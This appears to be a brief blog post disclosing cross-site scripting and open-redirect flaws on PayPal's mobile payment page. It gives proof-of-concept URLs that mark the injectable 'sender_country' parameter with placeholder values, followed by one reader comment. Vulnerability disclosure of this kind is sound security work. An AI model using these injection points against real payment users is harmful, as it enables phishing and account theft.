Proof of concept:
https://www.sandbox.paypal.com/nvpsm?amount=5.00&currency_code=USD&sender_country=XSS
https://www.paypal.com/nvpsm?amount=5.00&currency_code=USD&sender_country=XSS
https://www.paypal.com/nvpsm?amount=5.00&currency_code=USD&sender_country=Redirect


See also PayPal Mobile site XSS & Redirect Vulnerabilities
Mirror: http://www.xssed.com
1 comment:
Things like that shouldn't happen.